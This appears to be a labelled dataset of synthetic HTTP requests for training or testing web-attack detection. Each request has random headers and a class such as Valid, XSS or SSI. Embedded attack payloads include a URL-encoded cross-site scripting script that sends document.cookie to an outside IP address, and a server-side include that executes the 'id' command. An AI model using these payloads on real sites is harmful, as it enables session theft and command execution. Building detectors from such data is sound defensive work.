GET /tN1K6W/uI3UiB@zOUqP6RV/UBKp-Z9/RQ9perlqqEu_NYy/rtdW..png?3eifx5tdat0eth=04&1osdeOu=cbesl&eT8rfy01=tV%40PaTG&8riadnh=48 HTTP/1.0
Host: www.A0ttv8tUi.org:528
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ag6r-0v6u;q=0.6, aqln-n61, hAcwsheh-be;q=0.4, fnts8orh-inth, a-t;q=0.5
Cache-Control: no-store
Client-ip: 95.52.67.108
Cookie: C5x@H3Qu=kcd1D;rd0Gisnwte4dAr=558563;2mb3rim=84511;eots8=h9mCconnectenR>ameta;ann7toleys06p=00
Cookie2: $Version="7"
Date: Tue, 01 Sep 09 03:19:03 CET
ETag: "aimxGMxcRF7.c8Y"
Expect: 100-continue
From: etve6nr2@hnieae.cz
If-Modified-Since: Wed, 09 Jul 08 23:45:08 UTC
If-Unmodified-Since: Fri, 03 Sep 04 08:34:50 GMT
If-Match: *
If-None-Match: "4F3H_aNjh0QyPJLM2"
If-Range: *
Max-Forwards: 932
MIME-Version: 3.1
Pragma: yrn='e'
Proxy-Authorization: NTLM ZUVrZWl0Zm9jaWRhdG5lU3JFaU81ZDFtN2RlRW5vZ29zYzM=
Authorization: Digest nonce
Range: -2
Referer: /ad7e0/fnkbeoia/iaqdiji/fnmtns/Ot7HyT.avi
TE: chunked;q=0.8,trailers
Trailer: If-None-Match
User-Agent: iRhaee
UA-CPU: MIPS
UA-Disp: 859,2266,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 701x262
Via: 5.8 www.pounelnt.js
Transfer-Encoding: deflate
Upgrade: eoPrtm/3.6, odfe/2.3, Iorla/2.0, tdlt/6.3
Warning: 813 226.224.5.12 "nenDbioeTeurpj" 
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 21280
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12067
Start - Id: 25094
class: Valid
GET /eXD7UG@k4S7b0y/EEPA/erow70did6hLo/Ilty4Rn/xSa/oNj3u62v/JCWX57_DG6b/mB.oQTm1gn.php3?6UjYDxE3_jy=ee%26%3Fri8gasipruu&aiie=n%7Exmls&7eP80s=atgnullc HTTP/1.0
Host: www.iks5.net
Connection: keep-alive
Accept: image/*, application/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dt-deNxtapz, m2AOgbuT-w;q=0.6, ic-aeljIo, slV-cthoi9;q=0.9
Cache-Control: max-stale=8
Client-ip: 224.227.43.72
Cookie: hokeestjiuxw=2 ouya>00d];Ltei9lyr=oucardocumentaae b;g75m-ywp7=p|aE88lr8 ;ae=xrohtacces teEev3 hmrnilf;9SmTwinntLKS9NiT=ove]ejdukor;hnoE=h1xa
Cookie2: $Version="19"
Date: Sun, 19 Nov 06 18:39:34 GMT
ETag: "buE3l-3D03kvNOAJTC"
Expect: 100-continue
From: hixb@siilehs.org
If-Modified-Since: Tue, 29 Jul 08 14:49:23 UTC
If-Unmodified-Since: Mon, 24 May 04 03:40:36 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 30 Mar 10 16:00:59 GMT
Max-Forwards: 654
MIME-Version: 9.2
Pragma: re8dr=Xg8h
Proxy-Authorization: Basic aWdycTA6YXRpYWFpbw==
Authorization: Digest response="b05fCEaD2af7fadCA3edb1D9CDEE1dF4"
Range: -382555,561-,08492-
Referer: http://www.tiin.com/epudc.cgi
TE: trailers,gzip
Trailer: From
User-Agent: OpbdifhlellninuHn
UA-CPU: PowerPC
UA-Disp: 0466,0106,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 131x6281
Via: 9.8 44.175.95.180
Transfer-Encoding: ai5lr
Upgrade: ece8ta/9.4, ieanW/9.7, nrhas/2.7, hela/0.5
Warning: 642 253.124.12.232 "tnzgoO" "Wed, 21 Apr 04 07:49:37 UTC"
X-Forwarded-For: 64.157.250.51
X-Serial-Number: 714579
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25094
Start - Id: 25960
class: Valid
GET /dtq9itahnfuR0awtl4Lt/Olxc/d9vod/ecFNBaWYKPeJ_6Tr.jpeg?g-u-sCJ54O=yyahtoOjei&iar2o=524039&fan8Rhda=aiiw&dtesfbdytrjte=NrteIoacS5mnlR8&oIxItneoi6n=rtshk0l7ui.&OyT9qsftHtdb=1131015&nm2ao=6oic2daogcohoA5ne&neroeEi=tiTqoirpoRsinraaet&sgeXtnqubra=y0nag0&4vpU5=hjLgcn&eaBnh4t2tuaelR=oit7ouahjnndmo&FrcpIS-7=r9lEMunaHfno&tYformj=els8window.openechoytelnetha39nstt&aApaqm=5645804 HTTP/1.1
Host: www.ernctreseD.st
Connection: close
Accept: audio/basic;q=0.8
Accept-Charset: *
Accept-Encoding: compress, deflate, gzip
Accept-Language: n7mdapp-nketkium, sea-mt, ntoht0c-n, nnu-ststsriA, ish-exhs2l;q=0.0
Cache-Control: no-store
Client-ip: 24.235.222.46
Cookie: aamoaf=508347;lsk1Qkjkvar=514;COpservicesL-IF=99;es2paez5ord=psznzaStmnTs5h6
Cookie2: $Version="4"
Date: Thu, 10 Sep 09 21:36:15 CET
ETag: W/"wo3tumGbCtZlZ-PW4n"
Expect: aTaral
From: tztba@mlyibacoy2.cz
If-Modified-Since: Sat, 12 Mar 05 14:54:02 CET
If-Unmodified-Since: Thu, 06 Nov 08 11:56:37 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 37
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: dq3Bsa A2qrtl=9wki
Authorization: rtsr 0dSh=iih9
Range: 041-
Referer: http://www.riet.be/hate7vcv/loelhcTm.cfm
TE: trailers,chunked;q=0.2
Trailer: Host
User-Agent: Mozilla/2.1 (compatible; rtvws; SunOS sun4u; 6i9sthwl)
UA-CPU: MIPS
UA-Disp: 3281,342,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5187x1770
Via: FTP/0.9 185.51.77.179, 8.3 www.eanaca0i.tiff, uea/7.7 www.oeiuk.html
Transfer-Encoding: deflate
Upgrade: ci5/2.9, wetema/8.5, v8el3/8.4, izrs/8.5
Warning: 432 www.i3ei.js "ertmdUhs2iS" 
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 7358470
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25960
Start - Id: 34455
class: Valid
PUT /r3pdv9@xdX9uDunChvYz/iL5hdt1/xXeSRJg2VNE5/sreeeleesang73a/fiohahheR7l7axmleyo/unionq.msf? HTTP/1.0
Content-Length: 41
Content-Language: sS6od3,arChit
Content-Encoding: gzip
Content-Location: http://iiwese.uk/e9be/iulhh.avi
Content-MD5: b2pycnNlZTlkZWlpT2Fvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Nov 07 04:53:04 CET
Last-Modified: Thu, 26 Feb 09 19:14:45 CET
Host: www.te7reo.st
Connection: close
Accept: image/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 123.214.67.119
Cookie: tNhc=l3gq3i
Cookie2: $Version="4"
Date: Fri, 25 Apr 08 12:26:19 CET
ETag: "mLwcwC0gs5I@7VGS"
Expect: stlpsz=aliisi
From: 7mfJfrJ@Etuoenx85.it
If-Modified-Since: Sat, 20 Nov 04 18:07:26 CET
If-Unmodified-Since: Sun, 13 Dec 09 04:38:12 UTC
If-Match: "dCY4F-FJAUva.NdHSWZ"
If-None-Match: *
If-Range: "UNh22n3t@BNAm4UrVu.D"
Max-Forwards: 186
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic Y3k0YWRhaGU6M2tlZQ==
Authorization: Digest username="Etzl"
Range: 72-2529,-2,002-88966
Referer: /s2inuq.swf
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.1 (Machintosh; U; PPC Mac OS X 5.9; dm-Hn; rv:0.1.0) Gecko/19042546
UA-CPU: StrongARM
UA-Disp: 7789,084,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3150x9630
Via: HTTP/4.5 56.32.217.241, 5.2 225.107.44.145
Transfer-Encoding: identity
Upgrade: ntuhig/1.9
Warning: 105 137.166.167.66 "0koTah" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 481380347065639968
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

iue0obnibD=tM3g9HVzY&vcronapnf=4BMMbtIG__

End - Id: 34455
Start - Id: 2185
class: Valid
GET /efQX-umB89PmA/ezV75ggMwzGGMt_0/bnstuseawoao/kPigEey/j58il.SqYI/ur9loot/EsaepibirraaFsd1br3E/_Njmo12TX/oWLY9yXC.Tf@uSzLORV/hQgUiUAydaCQj/x8dsystemecho-KTrstylehGN/esaom1talistTqTr.png?WFB-c2n-BGRa=zRacri&emTaxv=6is8ey0ko&zckasnerurvueo=568946&rEm=oIodRU2A1A&n5IdhybrTm=ttroginputnspEao&74xtermjDPpD=8ptms HTTP/1.1
Host: 65.119.223.187
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: cp-936;q=0.8
Accept-Encoding: 
Accept-Language: a-na, soha-kdiwc6h;q=0.3
Cache-Control: min-fresh=5455
Client-ip: 252.18.215.205
Cookie: 1I3eaab=n2CC;ixe2fOf9ognert=440425;P5metametaHx.llogFE=2t;cmdCd1a=(betweenmItiO processing-instructionLe=[hl;isoah=im4
Cookie2: $Version="0"
Date: Sun, 13 May 07 08:56:40 GMT
ETag: "7dKcolqFrPttQt23Vf"
Expect: 100-continue
From: uh0aptar@aseielph5.com
If-Modified-Since: Mon, 25 Dec 06 19:54:04 UTC
If-Unmodified-Since: Tue, 05 Aug 08 14:40:03 GMT
If-Match: *
If-None-Match: "UEEkang0Djte_@y"
If-Range: *
Max-Forwards: 4
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM ZW9vem9xYXRseGtpUG5lZUVva0JsZXl5YnUxYXJvdHBobHZlZ29SSUE=
Authorization: Basic YXNoaW9hOmV3cmM=
Range: 789-
Referer: http://www.tN1ha.st/tIeT/rb5ap9f.mdb
TE: trailers
Trailer: Expect
User-Agent: tdaaewe (aJsibC6nAk; eGRjJ8h; 0nQPRHndhF; svRnt.; dC3B1eFC)
UA-CPU: PowerPC
UA-Disp: 8951,7788,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 270x992
Via: 1.3 www.inne7ly6.tiff, nmtE3y/3.7 144.167.44.111:0, 0dm/4.3 www.tdecEzt9.gif
Transfer-Encoding: identity
Upgrade: sna/4.3
Warning: 821 104.1.134.166 "maqrtuteli" "Fri, 07 Jan 05 07:27:00 CET"
X-Forwarded-For: 130.173.148.175
X-Serial-Number: 26606464842114964
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 2185
Start - Id: 4492
class: Valid
POST /3wp-6/Lnetcattmpliba5/aixDeHZW-9E/hoZzAzSPGZn2zkt/g-tUOtM_zLJqtVPgDZm.html? HTTP/1.1
Content-Length: 258
Content-Language: eldt,rtnro
Content-Encoding: deflate
Content-Location: /apbW/tnweltet/ehSecCos/thii8e.swf
Content-MD5: cGl0ZW1ibXJocGhlbm0yZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Mar 10 22:38:23 CET
Last-Modified: Mon, 12 Jan 09 18:37:09 UTC
Host: 131.90.209.199
Connection: close
Accept: */*
Accept-Charset: isiri-3342, x-mac-ce;q=0.5
Accept-Encoding: 
Accept-Language: gtmuOp-1, isul1d-ro2atmdt;q=0.7
Cache-Control: min-fresh=02483
Client-ip: 149.162.5.231
Cookie: 7PhAonsooqeW=sb1S;8hf=2003327;yonsa=Ezn9tlalib;tcln2ndceestflr=1114
Cookie2: $Version="499"
Date: Thu, 18 Jan 07 14:33:55 UTC
ETag: "YaR8h4..MtPzo2V68"
Expect: St1qor
From: bf9teahb@eaaAl.be
If-Modified-Since: Wed, 19 Nov 08 02:39:45 CET
If-Unmodified-Since: Mon, 26 Apr 10 22:19:13 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 15 Apr 08 16:54:55 UTC
Max-Forwards: 866
MIME-Version: 8.4
Pragma: 1a=oeQy
Proxy-Authorization: Digest username="dorrt"
Authorization: Basic ZXRybnNjaWE6bm01cw==
Range: 58-081,-238
Referer: /ftelnp/cVrn/ohth/iDsoaoe.php4
TE: trailers
Trailer: Accept
User-Agent: Mozilla/9.9 (X11; U; SunOS sun4u 1.5; tp-ir; rv:9.3.3) Gecko/75869606
UA-CPU: StrongARM
UA-Disp: 9080,142,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1131x282
Via: 1.9 158.73.51.77
Transfer-Encoding: identity
Upgrade: Nh5/1.2, 4illg/1.5, plnv0/0.1, dsEn4/3.7
Warning: 842 189.66.165.24 "ccUelchs9dtqh" 
X-Forwarded-For: 108.74.212.152
X-Serial-Number: 944553276
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ahtrta28hdri=oor&seeusnoo=9xRgbruzalq1Gin&En2j-=h~~s&2kAoal4xK=8194&th=z&esltbht=uenO&dS.Ei2MjZ0Llocation=ade9utpositionwbcmd8o oaal&2m&eelhcaRb4h=tgpaKE&Slrgt=88000&Ehhutbt=atsaa6i9csma&cii7erpvlbfom=785471&if=3169&OPbbAXZkgz=9344936&X1FURt5qAu=803198

End - Id: 4492
Start - Id: 47508
class: XSS
GET /etS/pod5rng/sireicalT/a0q/4Ices6NaTarrHoichytb/eJ/c46_cFDJzl/asO9m4PeSEcwundiZ9U1.bin?3wXVgB.@JQq0=%2FoTreplace&QxDqBOY.=pwa2hesiwtANondte&iux=515132691&nZ0tY=ezeam0tzlis&MR1raphpC=edyIWMH%40ft&tevnhneoHu=emNpdis&qTA=onSl&hatme2bn=+&otNL=ndNsMistlleeea&2epsginmRii=%3C%21%5BCDATA%5B%3C%21--%5D%5D+%3E%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F201.67.39.105%2Fllndis.sh%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E HTTP/1.0
Host: 124.200.84.75
Connection: close
Accept: application/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 121.61.23.210
Cookie: wbasrnTjea=nqo;oRoostsuasrfo=rcpawhere;jel3yamy8t3n=t deletehe2e'tilrjkwhere;teC0ea3EnS=eetodeood0tixaon;nrnwfltt6st=968;hOti8e2sneida=0
Cookie2: $Version="817"
Date: Tue, 18 Nov 08 01:56:00 GMT
ETag: "dIPNLS0aa50rxkRTCyiH"
Expect: narz
From: eudn2a@se5tse.com
If-Modified-Since: Sat, 22 Mar 08 23:34:35 CET
If-Unmodified-Since: Sun, 23 Jan 05 04:10:37 GMT
If-Match: "GFAfeUfcH9WAiYq"
If-None-Match: "psPV2ruvNNT45x2-w"
If-Range: Sat, 02 Dec 06 11:22:49 GMT
Max-Forwards: 8804
MIME-Version: 9.4
Pragma: eE=eo
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic bHQ5YXR4RW46YXMxdA==
Range: -582231
Referer: http://e1o00y.st/er4Fts0/9aoiyzor/K3uw.cgi
TE: chunked
Trailer: Authorization
User-Agent: Mozilla/7.8 (X11; U; Open BSD i386 9.8; xo-e8; rv:4.7.4) Gecko/42615442
UA-CPU: PowerPC
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7841x155
Via: HTTP/5.9 182.75.75.3, 3.0 5.254.242.124
Transfer-Encoding: compress
Upgrade: atsa/8.3
Warning: 840 www.salomt.jpg "rNd8aaEbphDe" "Fri, 08 Sep 06 13:06:00 GMT"
X-Forwarded-For: 128.172.113.199
X-Serial-Number: 870651819
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47508
Start - Id: 19855
class: Valid
GET /m.t1EjEzn/nyAreboeeoae1uoin5/ZRz9nOselectuxX-/fAvtrvDq/I9form/9gpgGonEkFRO@7GA/AsrnPobnesfd/r6yac/dgsMe/mrO87V.6FCur1KEnz.mspx? HTTP/1.0
Host: 238.249.119.26
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: t6E-wSh7rle;q=0.3, uvh-jtoh;q=0.6, lww17t2-d;q=0.2
Cache-Control: no-transform
Client-ip: 18.141.33.165
Cookie: Grjm7WGb=egtmo;HdLimen=1733336;Ep1sh3koaweea=2236477;tg2n=rz;
Cookie2: $Version="7"
Date: Sun, 18 Feb 07 04:45:20 GMT
ETag: "vVxwCMFMmG2BOCb9eJn"
Expect: 100-continue
From: bisdtps@swes4lai54.net
If-Modified-Since: Mon, 03 Apr 06 04:16:23 CET
If-Unmodified-Since: Fri, 29 Apr 05 12:27:35 GMT
If-Match: "2YKgpSR1A3w1QdRN-"
If-None-Match: "BuJQPFa0Pu90wQDc4d"
If-Range: Sun, 17 Apr 05 15:47:29 UTC
Max-Forwards: 5167
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="1edg8te"
Authorization: Basic YW93aGV0RWg6bjhocw==
Range: -849,258-97,-882215
Referer: /sgSsedt/6nuMa6o/0Ce59st/exesCc/gubnlnIC.tiff
TE: deflate;q=0.4,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/5.4 (compatible; Konqueror/5.7; SunOS sun4u; nyIuaoipi; ags2u; djteocg)
UA-CPU: StrongARM
UA-Disp: 8579,909,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 850x3369
Via: 7.7 www.rktjya.png, selou/7.8 90.200.197.120
Transfer-Encoding: trsc
Upgrade: ieot/7.9
Warning: 943 237.25.13.45 "Lnhareesflia5" 
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 62361021711
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19855
Start - Id: 40029
class: SSI
GET /ivSn-IujjedYa8dEnbm/rEsdilrdualac4na/PefSmSEuNXMNscriptgu/7L4.FlzUz3Nl2kQ-SIK./tJ/zMUZd3eqp/ynb2rbbnuduamal/c6phShX/50r/aZOEg-AzzdpxyXh5YtDA/rbWjK54H6O6J.dr/sh6hEnhhqesiryelollt.msf?BWUZj7-IvP=%3C%21+++%23%3C%21--++%23exec+++cmd%3D%22id%22--%3E HTTP/1.1
Host: www.M4edecwd.uk:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: identity, deflate, deflate;q=0.5, deflate
Accept-Language: mts-mNoad;q=0.1, nnyedt-fYoiyx, Ikeahma-6slm;q=0.8, n-y, nttdnika-masu3eav;q=0.7
Cache-Control: max-age=90
Client-ip: 160.214.20.200
Cookie: ec3b=924643;iq5natvet=acceptt0a db?ei;aqe8zte=lkeoI8;tgr=sckdyas;lmeftnlrt3piE=34
Cookie2: $Version="286"
Date: Thu, 31 Aug 06 10:19:48 CET
ETag: W/"InT@8Fc@jEaB.CC3M5"
Expect: ness
From: bic3us@lb0or.fr
If-Modified-Since: Fri, 05 Aug 05 01:08:42 GMT
If-Unmodified-Since: Wed, 05 Apr 06 14:11:47 GMT
If-Match: "kWNsR4Zhpe8lvSaNn5"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: 0uee tt6qsn=eithco
Authorization: NTLM Z2FvdWlhZ3VUcmNpQXNhZWVuYXNlYTBzZXRhbHJuZTNlZQ==
Range: 41683-1312,-3
Referer: /nOtsrtu.mdb
TE: deflate;q=0.4,trailers
Trailer: Warning
User-Agent: Eei9wees/2.7
UA-CPU: Sparc
UA-Disp: 1313,496,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 0.6 www.isiauri.shtml, 8.4 www.tluiIao.jpeg
Transfer-Encoding: compress
Upgrade: 9gTeo/9.5
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 92.41.36.53
X-Serial-Number: 18116
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40029
Start - Id: 22401
class: Valid
GET /bahdoQU6KafC7/lnbga8t6/1o-i616-J5nC5jWqCv/Pv@mAnndW/F6epANBG2d-YVrn/tn5dsci/dYtpqIL.css? HTTP/1.1
Host: www.gesIvtk.biz
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: miRot2hT-hsawiazt, eEi2-e;q=0.2, ihisms-tNHlni;q=0.4, eu-oiNBh;q=0.9
Cache-Control: only-if-cached
Client-ip: 195.143.59.185
Cookie: nnuidou15ste=sw;l5=e 14and@xo~e;patett=e4WidImpSW
Cookie2: $Version="1"
Date: Sat, 24 May 08 13:23:08 GMT
ETag: "YYFg_yu6KSP23m7mP"
Expect: 100-continue
From: 1eNTR8ie@q3cs.biz
If-Modified-Since: Sun, 23 Sep 07 20:24:51 UTC
If-Unmodified-Since: Wed, 02 May 07 24:03:52 CET
If-Match: *
If-None-Match: "SlYxF6Yfz2yoVDw7"
If-Range: *
Max-Forwards: 4
MIME-Version: 0.8
Pragma: hs='tte'
Proxy-Authorization: rnic hovsi9ai=hhcDiun8
Authorization: Basic ZXRoZWRzOmhFOWFvbmk=
Range: 272882-6
Referer: /btnbs/goh1ub/sngrn7e/Dedo8teo/ieta.asp
TE: deflate
Trailer: Authorization
User-Agent: eD5i/8.1.2.3.8
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 112x1566
Via: iasaue/5.7 www.rnee.jpeg, FTP/6.4 www.Rwsa0sl.jpg
Transfer-Encoding: identity
Upgrade: anin8s/5.0, 42tdtt/2.9, tMob/9.6, 6sg/5.1
Warning: 245 169.86.241.14 "nhn9hhnhuaifml" "Sat, 17 Oct 09 10:05:26 CET"
X-Forwarded-For: 7.132.119.46
X-Serial-Number: 570685869927204
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 22401
Start - Id: 25589
class: Valid
GET /otugirbyoN0il/uS.NnFYYUxySuk_ke.N/hibuiett1erar/cwDrNw@ciuwIW/aN.exe?pDtdie=12 HTTP/1.0
Host: www.le6qao6dv.st
Connection: keep-alive
Accept: video/quicktime;q=0.4, image/*;q=0.9
Accept-Charset: euc-cn, iso-2022-kr, cp-932, iso-8859-8-i;q=0.2
Accept-Encoding: *
Accept-Language: teeAo-ac;q=0.4, tsh-15dn9Rhx;q=0.5, s7sin1-3, easoi-xaHsa7nn
Cache-Control: max-age=3534
Client-ip: 254.210.233.20
Cookie: mIrspaiaibfdm=gtd-30;4d=484711
Cookie2: $Version="432"
Date: Thu, 16 Jun 05 06:30:10 CET
ETag: "NNBf2owU_ntQDH3l5"
Expect: 100-continue
From: camaabz@oEUygi.cz
If-Modified-Since: Sun, 22 Feb 09 21:43:33 CET
If-Unmodified-Since: Tue, 06 Nov 07 13:48:33 CET
If-Match: "pbFbhnMpeLuxlvC"
If-None-Match: *
If-Range: Sun, 12 Jun 05 17:24:19 UTC
Max-Forwards: 019
MIME-Version: 6.8
Pragma: ae0f='c'
Proxy-Authorization: NTLM bmplYW5kMmVvaHNvb3NlZjdxdDRlZWl3Y3VkYWpha2ZiaHRzaWVUaWV5
Authorization: NTLM dHNkdWFhTmRwZUF0ZWxoSWM3a29pZmloc25sZXY4bm9uYjh4bw==
Range: 286-,8185-
Referer: /NO0mah3i/yee0q.js
TE: trailers,deflate,deflate
Trailer: If-Modified-Since
User-Agent: w09Dhkeom/6.3.6.9
UA-CPU: Sparc
UA-Disp: 8439,526,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 290x491
Via: FTP/7.9 228.193.169.87, 8.2 190.255.93.65
Transfer-Encoding: compress
Upgrade: ohwH/4.5
Warning: 089 33.136.50.173 "slomeeEwemt2tyii4es" 
X-Forwarded-For: 255.93.182.143
X-Serial-Number: 644521
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25589
Start - Id: 25854
class: Valid
GET /pa4i1aAai6/apHi3i0saqtalEsdnyE/QoQ2Ngwp-.lD/oQMo7ozfg6ut/5ie9deeNtnye.png?7seolsstiwee=1Abas&d1uhtlsiT=80100&ajhaEmQ=07117&gWrsoebm=w&mtdysye5milsybl=ci%3Ae-&lgjH73PT_=ati9nnoehi&nndEer8am=9850&bo=t&nph-e4bFRE=inputoiddM%29elhNaf&MtareroaiEiio=dylh&iL3Qb=+i&tno=ta HTTP/1.0
Host: www.dtvdc.uk
Connection: Ow1gEim
Accept: image/*;q=0.2, application/zip;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.7, gzip, compress;q=0.3, gzip
Accept-Language: oTtrcye-2te7nnnd;q=0.6, e7-hbet, a-rUm
Cache-Control: no-transform
Client-ip: 208.224.54.200
Cookie: ncrsiyxbj=ph5hetre n;s4=sOlibbetweendocumentiTn4wgeta;ribeTnn=stdin1seesmocha
Cookie2: $Version="1"
Date: Wed, 10 Feb 10 06:07:03 GMT
ETag: W/"6MIaRp5ZKJjYE0qAeHSK"
Expect: 100-continue
From: ejAah@oon5i.ch
If-Modified-Since: Fri, 30 Jul 04 24:47:21 UTC
If-Unmodified-Since: Tue, 29 Jan 08 14:35:52 GMT
If-Match: "oMJ1m.MiWE7Rjg4Zc"
If-None-Match: "QxkIjNHqb12O3ti25d"
If-Range: Sun, 16 Dec 07 06:27:06 GMT
Max-Forwards: 3
MIME-Version: 2.6
Pragma: 3raimtRd=g
Proxy-Authorization: lpm4t aNaOhes=tssi
Authorization: x7oes0 4cwcl=stsnerf
Range: -434
Referer: http://eeea.uk/titiajy/r1omnt.php4
TE: chunked,deflate,trailers
Trailer: Accept
User-Agent: Mozilla/1.8 (Windows; U; Win 9x 1.2; ew-qt; rv:6.3.2) Gecko/11168264
UA-CPU: 68000
UA-Disp: 587,0940,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 976x788
Via: 6.2 www.ti6lnmz.htm, 3.3 22.92.123.144, FTP/0.0 www.0ImkysR.tiff:6
Transfer-Encoding: identity
Upgrade: IuMf/4.2, qotH/5.2, nsgah/4.2, nTi/6.8
Warning: 430 4.80.20.99 "go7tpeadnR8aoEojob8" "Wed, 21 Sep 05 10:38:47 CET"
X-Forwarded-For: 191.147.18.123
X-Serial-Number: 50565
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25854
Start - Id: 28102
class: Valid
GET /me5rxstrgfmeaa/Oeshirsrbneemaf/1NyzxatU2u/bdrg4ag/nos55SH-/eicP@lZU-@B/XobjectEEA7K/ero9c/dpDj/tB4D2wilD@UMRxwPBaRg/whLnrxzaiqiyaAnnj.tiff? HTTP/1.0
Host: 54.139.120.3
Connection: i7oau
Accept: */*;q=0.3
Accept-Charset: x-mac-cyrillic;q=0.0, x-mac-korean
Accept-Encoding: 
Accept-Language: nNaNhv-tcteqhdo;q=0.0, naSpi-kt3oCtY
Cache-Control: no-store
Client-ip: 203.118.153.113
Cookie: hsr=2650680;acmstyle6XLDTo=88800762
Cookie2: $Version="6"
Date: Wed, 22 Jul 09 15:36:09 GMT
ETag: W/"XUfnP3E3zKGKY_kZ_"
Expect: 100-continue
From: pnlav3j@ifnra.biz
If-Modified-Since: Wed, 03 Mar 10 15:43:18 CET
If-Unmodified-Since: Fri, 23 Jul 04 10:12:36 CET
If-Match: "b64DTL3SoBu-ADuqEfD9"
If-None-Match: *
If-Range: "T529kDAYygjAvRvMb9"
Max-Forwards: 260
MIME-Version: 2.1
Pragma: ccateiW0=7gsE6e
Proxy-Authorization: NTLM c2huT3NveW4xN2lnNm5yeW9qbDR0ZmV1QUhvcmxhZXR0b21hZA==
Authorization: NTLM cDd1cmlzb2VvTnNwdGl0dGU1SHNjbnZhd2VzbnNvc3p0ZWtndDlsbXR4Y2Jo
Range: 432781-
Referer: http://eEemwzm.net/tvcicte0/tiBi/sneeUtyI.nsf
TE: deflate,chunked;q=0.6
Trailer: Accept-Charset
User-Agent: Mozilla/3.0 (Machintosh; U; PPC Mac OS X 9.5; r9-c1; rv:6.9.1) Gecko/12111668
UA-CPU: MIPS
UA-Disp: 166,4722,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4261x691
Via: HTTP/1.0 54.253.58.23, 8.7 186.82.248.119
Transfer-Encoding: gzip
Upgrade: bdNih/1.1, xdHnh/3.6, htee/4.4, 6mIer/6.0
Warning: 810 www.cq0i.htm "twdSte9atJriluetrna" 
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 00220093101680020421
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 28102
Start - Id: 46272
class: PathTransversal
